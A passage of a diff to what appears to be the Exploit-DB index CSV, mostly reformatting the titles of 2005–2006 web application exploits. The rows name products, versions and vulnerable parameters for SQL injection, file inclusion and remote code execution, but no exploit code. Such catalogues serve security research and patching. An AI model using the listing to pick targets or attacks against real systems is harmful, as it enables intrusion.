Exploit",2005-07-03,SecureD,php,webapps,0 +1080,platforms/php/webapps/1080.pl,"phpBB 2.0.15 - 'highlight' Database Authentication Details Exploit",2005-07-03,SecureD,php,webapps,0 1082,platforms/php/webapps/1082.pl,"XOOPS 2.0.11 - 'xmlrpc.php' SQL Injection",2005-07-04,RusH,php,webapps,0 1083,platforms/php/webapps/1083.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (2)",2005-07-04,dukenn,php,webapps,0 1084,platforms/php/webapps/1084.pl,"XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)",2005-07-04,"Mike Rifone",php,webapps,0 @@ -16711,7 +16712,7 @@ id,file,description,date,author,platform,type,port 1111,platforms/php/webapps/1111.pl,"Open Bulletin Board 1.0.5 - SQL Injection",2005-07-18,RusH,php,webapps,0 1112,platforms/asp/webapps/1112.txt,"Hosting Controller 6.1 HotFix 2.2 - Add Domain without Quota Exploit",2005-07-18,"Soroush Dalili",asp,webapps,0 1113,platforms/php/webapps/1113.pm,"phpBB 2.0.15 - PHP Remote Code Execution (Metasploit)",2005-07-19,str0ke,php,webapps,0 -1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - (current) Remote Command Execution",2005-07-25,newbug,cgi,webapps,0 +1120,platforms/cgi/webapps/1120.pl,"FtpLocate 2.02 - 'current' Remote Command Execution",2005-07-25,newbug,cgi,webapps,0 1133,platforms/php/webapps/1133.pm,"vBulletin 3.0.6 - 'template' Command Execution (Metasploit)",2005-08-03,str0ke,php,webapps,0 1134,platforms/php/webapps/1134.pl,"MySQL Eventum 1.5.5 - 'login.php' SQL Injection",2005-08-05,"James Bercegay",php,webapps,0 1135,platforms/php/webapps/1135.c,"PHP-Fusion 6.0.106 - BBCode IMG Tag Script Injection",2005-08-05,Easyex,php,webapps,0 @@ -16728,12 +16729,12 @@ id,file,description,date,author,platform,type,port 1208,platforms/php/webapps/1208.pl,"phpMyFamily 1.4.0 - SQL Injection",2005-03-27,basher13,php,webapps,0 1211,platforms/php/webapps/1211.pl,"PhpTagCool 1.0.3 - SQL Injection",2005-09-11,Megabyte,php,webapps,0 1214,platforms/php/webapps/1214.php,"AzDGDatingLite 2.1.3 - Remote Code Execution",2005-09-13,rgod,php,webapps,0 -1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - (module) SQL Injection",2005-09-15,RusH,php,webapps,0 +1217,platforms/php/webapps/1217.pl,"phpWebSite 0.10.0 - 'module' SQL Injection",2005-09-15,RusH,php,webapps,0 1219,platforms/php/webapps/1219.c,"PHP-Nuke 7.8 - 'modules.php' SQL Injection",2005-09-16,RusH,php,webapps,0 1221,platforms/php/webapps/1221.php,"CuteNews 1.4.0 - Shell Injection / Remote Command Execution",2005-09-17,rgod,php,webapps,0 -1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - (SearchString) SQL Injection",2005-09-22,rgod,php,webapps,0 -1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - (User-Agent) Remote Shell Injection",2005-09-23,rgod,php,webapps,0 -1227,platforms/php/webapps/1227.php,"MailGust 1.9 - (board takeover) SQL Injection",2005-09-24,rgod,php,webapps,0 +1225,platforms/php/webapps/1225.php,"My Little Forum 1.5 - 'SearchString' SQL Injection",2005-09-22,rgod,php,webapps,0 +1226,platforms/php/webapps/1226.php,"phpMyFAQ 1.5.1 - 'User-Agent' Remote Shell Injection",2005-09-23,rgod,php,webapps,0 +1227,platforms/php/webapps/1227.php,"MailGust 1.9 - Board Takeover SQL Injection",2005-09-24,rgod,php,webapps,0 1236,platforms/cgi/webapps/1236.pm,"Barracuda Spam Firewall < 3.1.18 - Command Execution (Metasploit)",2005-09-27,"Nicolas Gregoire",cgi,webapps,0 1237,platforms/php/webapps/1237.php,"PHP-Fusion 6.00.109 - 'msg_send' SQL Injection",2005-09-28,rgod,php,webapps,0 1240,platforms/php/webapps/1240.php,"Utopia News Pro 1.1.3 - 'news.php' SQL Injection",2005-10-06,rgod,php,webapps,0 @@ -16754,17 +16755,17 @@ id,file,description,date,author,platform,type,port 1317,platforms/php/webapps/1317.py,"Coppermine Photo Gallery 1.3.2 - File Retrieval SQL Injection",2005-11-13,DiGiTAL_MiDWAY,php,webapps,0 1319,platforms/php/webapps/1319.php,"Unclassified NewsBoard 1.5.3 Patch 3 - Blind SQL Injection",2005-11-14,rgod,php,webapps,0 1320,platforms/php/webapps/1320.txt,"Arki-DB 1.0 - 'catid' SQL Injection",2005-11-14,Devil-00,php,webapps,0 -1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 +1321,platforms/php/webapps/1321.pl,"Cyphor 0.19 - 'show.php?id' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 1322,platforms/php/webapps/1322.pl,"Wizz Forum 1.20 - 'TopicID' SQL Injection",2005-11-14,"HACKERS PAL",php,webapps,0 1324,platforms/php/webapps/1324.php,"PHPWebThings 1.4 - 'msg'/'forum' SQL Injection",2005-11-16,rgod,php,webapps,0 -1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - (forum) SQL Injection",2005-11-16,AhLam,php,webapps,0 +1325,platforms/php/webapps/1325.pl,"PHPWebThings 1.4 - 'forum' SQL Injection",2005-11-16,AhLam,php,webapps,0 1326,platforms/php/webapps/1326.pl,"PHP-Nuke 7.8 Search Module - SQL Injection",2005-11-16,anonymous,php,webapps,0 1329,platforms/php/webapps/1329.php,"EkinBoard 1.0.3 - '/config.php' SQL Injection / Command Execution",2005-11-17,rgod,php,webapps,0 1337,platforms/php/webapps/1337.php,"Mambo 4.5.2 - Globals Overwrite / Remote Command Execution",2005-11-22,rgod,php,webapps,0 1340,platforms/php/webapps/1340.php,"eFiction 2.0 - Fake '.GIF' Arbitrary File Upload",2005-11-25,rgod,php,webapps,0 -1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - (REMOTE_ADDR) Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 +1342,platforms/php/webapps/1342.php,"Guppy 4.5.9 - 'REMOTE_ADDR' Remote Commands Execution Exploit",2005-11-28,rgod,php,webapps,0 1354,platforms/php/webapps/1354.php,"Zen Cart 1.2.6d - 'password_forgotten.php' SQL Injection",2005-12-02,rgod,php,webapps,0 -1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - connector.php Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 +1356,platforms/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,php,webapps,0 1358,platforms/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Commands Execution Exploit",2005-12-06,rgod,php,webapps,0 1359,platforms/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,php,webapps,0 1361,platforms/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Commands Execution Exploit (C)",2005-12-07,unitedasia,php,webapps,0 @@ -16777,8 +16778,8 @@ id,file,description,date,author,platform,type,port 1382,platforms/php/webapps/1382.pl,"phpBB 2.0.18 - Remote Brute Force/Dictionary (2)",2006-02-20,DarkFig,php,webapps,0 1383,platforms/php/webapps/1383.txt,"phpBB 2.0.18 - Cross-Site Scripting / Cookie Disclosure",2005-12-21,jet,php,webapps,0 1385,platforms/php/webapps/1385.pl,"PHP-Fusion 6.00.3 - 'rating' SQL Injection",2005-12-23,krasza,php,webapps,0 -1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - (cat) SQL Injection",2005-12-24,rgod,php,webapps,0 -1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - (signature_bbcode_uid) Remote Command Exploit",2005-12-24,RusH,php,webapps,0 +1387,platforms/php/webapps/1387.php,"Dev Web Management System 1.5 - 'cat' SQL Injection",2005-12-24,rgod,php,webapps,0 +1388,platforms/php/webapps/1388.pl,"phpBB 2.0.17 - 'signature_bbcode_uid' Remote Command Exploit",2005-12-24,RusH,php,webapps,0 1395,platforms/php/webapps/1395.php,"phpDocumentor 1.3.0 rc4 - Remote Commands Execution Exploit",2005-12-29,rgod,php,webapps,0 1398,platforms/php/webapps/1398.pl,"CubeCart 3.0.6 - Remote Command Execution",2005-12-30,cijfer,php,webapps,0 1399,platforms/asp/webapps/1399.txt,"WebWiz Products 1.0/3.06 - Login Bypass (SQL Injection)",2005-12-30,DevilBox,asp,webapps,0 @@ -16788,55 +16789,55 @@ id,file,description,date,author,platform,type,port 1410,platforms/php/webapps/1410.pl,"Magic News Plus 1.0.3 - Admin Pass Change Exploit",2006-01-09,cijfer,php,webapps,0 1418,platforms/asp/webapps/1418.txt,"MiniNuke 1.8.2 - Multiple SQL Injections",2006-01-14,nukedx,asp,webapps,0 1419,platforms/asp/webapps/1419.pl,"MiniNuke 1.8.2 - 'hid' SQL Injection",2006-01-14,DetMyl,asp,webapps,0 -1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - (db_id) Remote Command Execution",2006-01-22,cijfer,php,webapps,0 -1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - (HTMLAREA) Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 +1442,platforms/php/webapps/1442.pl,"EZDatabase 2.0 - 'db_id' Remote Command Execution",2006-01-22,cijfer,php,webapps,0 +1446,platforms/php/webapps/1446.pl,"creLoaded 6.15 - 'HTMLAREA' Automated Perl Exploit",2006-01-24,kaneda,php,webapps,0 1453,platforms/php/webapps/1453.pl,"Phpclanwebsite 1.23.1 - SQL Injection",2006-01-25,matrix_killer,php,webapps,0 1457,platforms/php/webapps/1457.txt,"phpBB 2.0.19 - Cross-Site Scripting Remote Cookie Disclosure",2006-01-29,threesixthousan,php,webapps,0 1459,platforms/php/webapps/1459.pl,"xeCMS 1.0.0 RC 2 - 'cookie' Remote Command Execution",2006-01-30,cijfer,php,webapps,0 1461,platforms/php/webapps/1461.pl,"Invision Power Board Dragoran Portal Mod 1.3 - SQL Injection",2006-01-31,SkOd,php,webapps,0 1467,platforms/php/webapps/1467.php,"LoudBlog 0.4 - Remote File Inclusion",2006-02-03,rgod,php,webapps,0 1468,platforms/php/webapps/1468.php,"Clever Copy 3.0 - Admin Auth Details / SQL Injection",2006-02-04,rgod,php,webapps,0 -1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - (Style Changer/Demo Mod) SQL Injection",2006-02-05,SkOd,php,webapps,0 -1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - (PATH_INFO) Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0 +1469,platforms/php/webapps/1469.pl,"phpBB 2.0.19 - Style Changer/Demo Mod SQL Injection",2006-02-05,SkOd,php,webapps,0 +1471,platforms/cgi/webapps/1471.pl,"MyQuiz 1.01 - 'PATH_INFO' Arbitrary Command Execution",2006-02-06,Hessam-x,cgi,webapps,0 1472,platforms/asp/webapps/1472.pl,"ASPThai.Net Guestbook 5.5 - Authentication Bypass",2006-02-06,Zodiac,asp,webapps,0 1478,platforms/php/webapps/1478.php,"CPGNuke Dragonfly 9.0.6.1 - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1482,platforms/php/webapps/1482.php,"SPIP 1.8.2g - Remote Commands Execution Exploit",2006-02-08,rgod,php,webapps,0 1484,platforms/php/webapps/1484.php,"FCKEditor 2.0 < 2.2 - 'FileManager connector.php' Arbitrary File Upload",2006-02-09,rgod,php,webapps,0 1485,platforms/php/webapps/1485.php,"RunCMS 1.2 - 'class.forumposts.php' Remote File Inclusion",2006-02-09,rgod,php,webapps,0 -1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - (file_exists) Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 +1491,platforms/php/webapps/1491.php,"DocMGR 0.54.2 - 'file_exists' Remote Commands Execution Exploit",2006-02-11,rgod,php,webapps,0 1492,platforms/php/webapps/1492.php,"Invision Power Board Army System Mod 2.1 - SQL Injection",2006-02-13,fRoGGz,php,webapps,0 1493,platforms/php/webapps/1493.php,"EnterpriseGS 1.0 rc4 - Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1494,platforms/php/webapps/1494.php,"FlySpray 0.9.7 - 'install-0.9.7.php' Remote Commands Execution Exploit",2006-02-13,rgod,php,webapps,0 1498,platforms/php/webapps/1498.php,"webSPELL 4.01 - 'title_op' SQL Injection",2006-02-14,x128,php,webapps,0 1499,platforms/php/webapps/1499.pl,"MyBulletinBoard (MyBB) 1.03 - Multiple SQL Injections",2006-02-15,"HACKERS PAL",php,webapps,0 -1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - (filecheck) Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 +1501,platforms/php/webapps/1501.php,"PHPKIT 1.6.1R2 - 'filecheck' Remote Commands Execution Exploit",2006-02-16,rgod,php,webapps,0 1503,platforms/php/webapps/1503.pl,"YapBB 1.2 - 'cfgIncludeDirectory' Remote Command Execution",2006-02-16,cijfer,php,webapps,0 -1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - (referer) Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 +1508,platforms/cgi/webapps/1508.pl,"AWStats < 6.4 - 'referer' Remote Command Execution",2006-02-17,RusH,cgi,webapps,0 1509,platforms/php/webapps/1509.pl,"Zorum Forum 3.5 - 'rollid' SQL Injection",2006-02-17,RusH,php,webapps,0 1510,platforms/php/webapps/1510.pl,"Gravity Board X 1.1 - 'csscontent' Remote Code Execution",2006-02-17,RusH,php,webapps,0 1511,platforms/php/webapps/1511.php,"Coppermine Photo Gallery 1.4.3 - Remote Commands Execution Exploit",2006-02-17,rgod,php,webapps,0 1512,platforms/php/webapps/1512.pl,"Admbook 1.2.2 - 'x-forwarded-for' Remote Command Execution",2006-02-19,rgod,php,webapps,0 -1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - (tid) SQL Injection",2006-02-19,x128,php,webapps,0 +1513,platforms/php/webapps/1513.php,"BXCP 0.2.9.9 - 'tid' SQL Injection",2006-02-19,x128,php,webapps,0 1514,platforms/asp/webapps/1514.pl,"MiniNuke 1.8.2b - 'pages.asp' SQL Injection",2006-02-19,nukedx,asp,webapps,0 1515,platforms/php/webapps/1515.pl,"GeekLog 1.x - 'error.log' (gpc = Off) Remote Commands Execution Exploit",2006-02-20,rgod,php,webapps,0 -1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - (tid) SQL Injection",2006-02-20,x128,php,webapps,0 -1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - (lowerTemplate) Remote Code Execution",2006-02-22,trueend5,php,webapps,0 +1516,platforms/php/webapps/1516.php,"ilchClan 1.05g - 'tid' SQL Injection",2006-02-20,x128,php,webapps,0 +1521,platforms/php/webapps/1521.php,"Noahs Classifieds 1.3 - 'lowerTemplate' Remote Code Execution",2006-02-22,trueend5,php,webapps,0 1522,platforms/php/webapps/1522.php,"NOCC Webmail 1.0 - Local File Inclusion / Remote Code Execution",2006-02-23,rgod,php,webapps,0 1523,platforms/php/webapps/1523.cpp,"PHP-Nuke 7.5 < 7.8 - 'Search' SQL Injection",2006-02-23,unitedbr,php,webapps,0 -1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - (Add User) Authentication Bypass",2006-02-23,RoMaNSoFt,php,webapps,0 +1524,platforms/php/webapps/1524.htm,"VHCS 2.4.7.1 - Add User Authentication Bypass",2006-02-23,RoMaNSoFt,php,webapps,0 1525,platforms/php/webapps/1525.pl,"phpWebSite 0.10.0-full - 'topics.php' SQL Injection",2006-02-24,SnIpEr_SA,php,webapps,0 -1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - (fid) SQL Injection",2006-02-24,x128,php,webapps,0 +1526,platforms/php/webapps/1526.php,"Lansuite 2.1.0 Beta - 'fid' SQL Injection",2006-02-24,x128,php,webapps,0 1527,platforms/php/webapps/1527.pl,"iGENUS WebMail 2.0.2 - 'config_inc.php' Remote Code Execution",2006-02-25,rgod,php,webapps,0 -1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - (newsdetailsview) SQL Injection",2006-02-25,nukedx,asp,webapps,0 +1528,platforms/asp/webapps/1528.pl,"Pentacle In-Out Board 6.03 - 'newsdetailsview' SQL Injection",2006-02-25,nukedx,asp,webapps,0 1529,platforms/asp/webapps/1529.htm,"Pentacle In-Out Board 6.03 - 'login.asp' Remote Authentication Bypass",2006-02-25,nukedx,asp,webapps,0 -1530,platforms/php/webapps/1530.pl,"saPHP Lesson 2.0 - (forumid) SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 +1530,platforms/php/webapps/1530.pl,"saPHP Lesson 2.0 - 'forumid' SQL Injection",2006-02-25,SnIpEr_SA,php,webapps,0 1532,platforms/php/webapps/1532.pl,"PwsPHP 1.2.3 - 'index.php' SQL Injection",2006-02-25,papipsycho,php,webapps,0 1533,platforms/php/webapps/1533.php,"4Images 1.7.1 - Local File Inclusion / Remote Code Execution",2006-02-26,rgod,php,webapps,0 1538,platforms/php/webapps/1538.pl,"Farsinews 2.5 - Directory Traversal Arbitrary 'users.db' Access Exploit",2006-02-28,Hessam-x,php,webapps,0 1539,platforms/php/webapps/1539.txt,"MyBulletinBoard (MyBB) 1.03 - 'misc.php' SQL Injection",2006-02-28,Devil-00,php,webapps,0 1541,platforms/php/webapps/1541.pl,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution",2006-03-01,str0ke,php,webapps,0 1542,platforms/php/webapps/1542.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (1)",2006-03-01,LorD,php,webapps,0 -1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection (mq=off)",2006-03-01,KingOfSka,php,webapps,0 +1543,platforms/php/webapps/1543.pl,"vuBB 0.2 - 'cookie' Final SQL Injection 'mq=off'",2006-03-01,KingOfSka,php,webapps,0 1544,platforms/php/webapps/1544.pl,"Woltlab Burning Board 2.x - Datenbank MOD (fileid) SQL Injection",2006-03-01,nukedx,php,webapps,0 1546,platforms/php/webapps/1546.pl,"phpRPC Library 0.7 - XML Data Decoding Remote Code Execution (2)",2006-03-02,cijfer,php,webapps,0 1547,platforms/php/webapps/1547.txt,"Aztek Forum 4.00 - Cross-Site Scripting / SQL Injection",2006-03-02,lorenzo,php,webapps,0 @@ -16844,16 +16845,16 @@ id,file,description,date,author,platform,type,port 1549,platforms/php/webapps/1549.php,"PHP-Stats 0.1.9.1 - Remote Commands Execution Exploit",2006-03-04,rgod,php,webapps,0 1550,platforms/asp/webapps/1550.txt,"TotalECommerce 1.0 - 'index.asp id' SQL Injection",2006-03-04,nukedx,asp,webapps,0 1553,platforms/php/webapps/1553.pl,"Fantastic News 2.1.2 - 'script_path' Remote Code Execution",2006-03-04,uid0,php,webapps,0 -1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - (load) SQL Injection",2006-03-06,SkOd,php,webapps,0 -1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - (xrms_file_root) Code Execution",2006-03-07,rgod,php,webapps,0 +1556,platforms/php/webapps/1556.pl,"D2-Shoutbox 4.2 IPB Mod - 'load' SQL Injection",2006-03-06,SkOd,php,webapps,0 +1561,platforms/php/webapps/1561.pl,"OWL Intranet Engine 0.82 - 'xrms_file_root' Code Execution",2006-03-07,rgod,php,webapps,0 1562,platforms/asp/webapps/1562.pl,"CilemNews System 1.1 - 'yazdir.asp' haber_id SQL Injection",2006-03-07,nukedx,asp,webapps,0 1563,platforms/php/webapps/1563.pm,"Limbo CMS 1.0.4.2 - 'itemID' Remote Code Execution (Metasploit)",2006-03-07,sirh0t,php,webapps,0 1566,platforms/php/webapps/1566.php,"Gallery 2.0.3 - stepOrder[] Remote Commands Execution Exploit",2006-03-08,rgod,php,webapps,0 1567,platforms/php/webapps/1567.php,"RedBLoG 0.5 - 'cat_id' SQL Injection",2006-03-08,x128,php,webapps,0 -1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - (memName) SQL Injection",2006-03-09,DevilBox,asp,webapps,0 -1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - (date) Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 +1569,platforms/asp/webapps/1569.pl,"d2kBlog 1.0.3 - 'memName' SQL Injection",2006-03-09,DevilBox,asp,webapps,0 +1570,platforms/php/webapps/1570.pl,"Light Weight Calendar 1.x - 'date' Remote Code Execution",2006-03-09,Hessam-x,php,webapps,0 1571,platforms/asp/webapps/1571.htm,"JiRos Banner Experience 1.0 - Create Authentication Bypass Remote Exploit",2006-03-09,nukedx,asp,webapps,0 -1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - (include_files) Remote Code Execution",2006-03-11,rgod,php,webapps,0 +1575,platforms/php/webapps/1575.pl,"Guestbook Script 1.7 - 'include_files' Remote Code Execution",2006-03-11,rgod,php,webapps,0 1576,platforms/php/webapps/1576.txt,"Jupiter CMS 1.1.5 - Multiple Cross-Site Scripting Vulnerabilities",2006-03-11,Nomenumbra,php,webapps,0 1581,platforms/php/webapps/1581.pl,"Simple PHP Blog 0.4.7.1 - Remote Command Execution",2006-03-13,rgod,php,webapps,0 1585,platforms/php/webapps/1585.php,"PHP iCalendar 2.21 - 'cookie' Remote Code Execution",2006-03-15,rgod,php,webapps,0 @@ -16862,11 +16863,11 @@ id,file,description,date,author,platform,type,port 1588,platforms/php/webapps/1588.php,"nodez 4.6.1.1 mercury - Multiple Vulnerabilities",2006-03-18,rgod,php,webapps,0 1589,platforms/asp/webapps/1589.pl,"BetaParticle Blog 6.0 - 'fldGalleryID' SQL Injection",2006-03-18,nukedx,asp,webapps,0 1590,platforms/php/webapps/1590.pl,"ShoutLIVE 1.1.0 - 'savesettings.php' Remote Code Execution",2006-03-18,DarkFig,php,webapps,0 -1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - (mail) Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0 +1594,platforms/php/webapps/1594.py,"SoftBB 0.1 - 'mail' Blind SQL Injection",2006-03-19,LOTFREE,php,webapps,0 1595,platforms/php/webapps/1595.php,"gCards 1.45 - Multiple Vulnerabilities",2006-03-20,rgod,php,webapps,0 1597,platforms/asp/webapps/1597.pl,"ASPPortal 3.1.1 - 'downloadid' SQL Injection",2006-03-20,nukedx,asp,webapps,0 1600,platforms/php/webapps/1600.php,"FreeWPS 2.11 - 'images.php' Remote Code Execution",2006-03-21,x128,php,webapps,0 -1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - (upload) Remote Command Execution",2006-03-22,rgod,php,webapps,0 +1605,platforms/php/webapps/1605.php,"XHP CMS 0.5 - 'upload' Remote Command Execution",2006-03-22,rgod,php,webapps,0 1608,platforms/php/webapps/1608.php,"WebAlbum 2.02pl - COOKIE[skin2] Remote Code Execution",2006-03-25,rgod,php,webapps,0 1609,platforms/php/webapps/1609.pl,"PHP Ticket 0.71 - 'search.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 1610,platforms/php/webapps/1610.txt,"phpBookingCalendar 1.0c - 'details_view.php' SQL Injection",2006-03-25,undefined1_,php,webapps,0 @@ -16877,17 +16878,17 @@ id,file,description,date,author,platform,type,port 1618,platforms/php/webapps/1618.c,"GreyMatter WebLog 1.21d - Remote Command Execution (1)",2006-03-28,No_Face_King,php,webapps,0 1619,platforms/php/webapps/1619.pl,"GreyMatter WebLog 1.21d - Remote Command Execution (2)",2006-03-28,Hessam-x,php,webapps,0 1621,platforms/php/webapps/1621.php,"Plogger Beta 2.1 - Administrative Credentials Disclosure",2006-03-28,rgod,php,webapps,0 -1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - (Scheme) SQL Injection",2006-03-29,nukedx,asp,webapps,0 +1623,platforms/asp/webapps/1623.pl,"EzASPSite 2.0 RC3 - 'Scheme' SQL Injection",2006-03-29,nukedx,asp,webapps,0 1627,platforms/php/webapps/1627.php,"Claroline 1.7.4 - 'scormExport.inc.php' Remote Code Execution",2006-03-30,rgod,php,webapps,0 -1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - (libpath) Remote File Inclusion",2006-04-01,uid0,php,webapps,0 +1629,platforms/php/webapps/1629.pl,"SQuery 4.5 - 'libpath' Remote File Inclusion",2006-04-01,uid0,php,webapps,0 1630,platforms/php/webapps/1630.pl,"PHPNuke-Clan 3.0.1 - 'vwar_root2' Remote File Inclusion",2006-04-01,uid0,php,webapps,0 1631,platforms/php/webapps/1631.php,"ReloadCMS 1.2.5 - Cross-Site Scripting / Remote Code Execution",2006-04-02,rgod,php,webapps,0 1632,platforms/php/webapps/1632.pl,"VWar 1.5.0 R12 - Remote File Inclusion",2006-04-02,uid0,php,webapps,0 -1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - (installpath) Remote File Inclusion",2006-04-04,K-159,php,webapps,0 -1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - (base_path) Remote File Inclusion",2006-04-04,K-159,php,webapps,0 +1640,platforms/php/webapps/1640.pl,"AngelineCMS 0.8.1 - 'installpath' Remote File Inclusion",2006-04-04,K-159,php,webapps,0 +1644,platforms/php/webapps/1644.pl,"INDEXU 5.0.1 - 'base_path' Remote File Inclusion",2006-04-04,K-159,php,webapps,0 1645,platforms/php/webapps/1645.pl,"Crafty Syntax Image Gallery 3.1g - Remote Code Execution",2006-04-04,undefined1_,php,webapps,0 -1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - (SYS enter) Remote Code Execution",2006-04-05,rgod,php,webapps,0 -1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - (SYS enter) Remote Code Execution",2006-04-06,rgod,php,webapps,0 +1646,platforms/php/webapps/1646.php,"phpMyChat 0.14.5 - SYS enter Remote Code Execution",2006-04-05,rgod,php,webapps,0 +1647,platforms/php/webapps/1647.php,"phpMyChat 0.15.0dev - SYS enter Remote Code Execution",2006-04-06,rgod,php,webapps,0 1650,platforms/php/webapps/1650.pl,"Horde Help Viewer 3.1 - Remote Command Execution",2006-04-07,deese,php,webapps,0 1652,platforms/php/webapps/1652.php,"ADODB < 4.70 (PHPOpenChat 3.0.x) - 'Server.php' SQL Injection",2006-04-09,rgod,php,webapps,0 1653,platforms/php/webapps/1653.txt,"dnGuestbook 2.0 - SQL Injection",2006-04-09,snatcher,php,webapps,0 @@ -16895,65 +16896,65 @@ id,file,description,date,author,platform,type,port 1655,platforms/php/webapps/1655.php,"XBrite Members 1.1 - 'id' SQL Injection",2006-04-09,snatcher,php,webapps,0 1656,platforms/php/webapps/1656.txt,"Sire 2.0 - '/lire.php' Remote File Inclusion / Arbitrary File Upload",2006-04-09,simo64,php,webapps,0 1659,platforms/php/webapps/1659.php,"phpList 2.10.2 - GLOBALS[] Remote Code Execution",2006-04-10,rgod,php,webapps,0 -1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - (Help Viewer) Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 -1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - (user_sig_bbcode_uid) Remote Code Execution",2006-04-10,RusH,php,webapps,0 +1660,platforms/php/webapps/1660.pm,"Horde 3.0.9/3.1.0 - Help Viewer Remote Code Execution (Metasploit)",2006-04-10,Inkubus,php,webapps,0 +1661,platforms/php/webapps/1661.pl,"phpBB 2.0.19 - 'user_sig_bbcode_uid' Remote Code Execution",2006-04-10,RusH,php,webapps,0 1662,platforms/php/webapps/1662.php,"Clansys 1.1 (showid) - SQL Injection",2006-04-10,snatcher,php,webapps,0 -1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - (s) Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 +1663,platforms/php/webapps/1663.php,"Simplog 0.9.2 - 's' Remote Commands Execution Exploit",2006-04-11,rgod,php,webapps,0 1665,platforms/php/webapps/1665.pl,"Sphider 1.3 - 'configset.php' Remote File Inclusion",2006-04-12,rgod,php,webapps,0 1666,platforms/php/webapps/1666.php,"PHP121 Instant Messenger 1.4 - Remote Code Execution",2006-04-12,rgod,php,webapps,0 1668,platforms/php/webapps/1668.php,"vBulletin ImpEx 1.74 - Remote Command Execution",2006-04-13,ReZEN,php,webapps,0 1669,platforms/cgi/webapps/1669.pl,"Censtore 7.3.x - 'censtore.cgi' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 1670,platforms/cgi/webapps/1670.pl,"quizz 1.01 - 'quizz.pl' Remote Command Execution",2006-04-13,FOX_MULDER,cgi,webapps,0 1672,platforms/php/webapps/1672.pl,"PAJAX 0.5.1 - Remote Code Execution",2006-04-13,Stoney,php,webapps,0 -1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - (hub_dir) Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 -1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - (extras) Source Code Disclosure",2006-04-14,rgod,php,webapps,0 +1673,platforms/php/webapps/1673.php,"phpWebSite 0.10.2 - 'hub_dir' Remote Commands Execution Exploit",2006-04-14,rgod,php,webapps,0 +1674,platforms/php/webapps/1674.txt,"osCommerce 2.2 - 'extras' Source Code Disclosure",2006-04-14,rgod,php,webapps,0 1677,platforms/cgi/webapps/1677.php,"SysInfo 1.21 - 'sysinfo.cgi' Remote Command Execution",2006-04-14,rgod,cgi,webapps,0 1678,platforms/php/webapps/1678.php,"PHP Album 0.3.2.3 - Remote Command Execution",2006-04-15,rgod,php,webapps,0 1680,platforms/cgi/webapps/1680.pm,"Symantec Sygate Management Server - 'LOGIN' SQL Injection 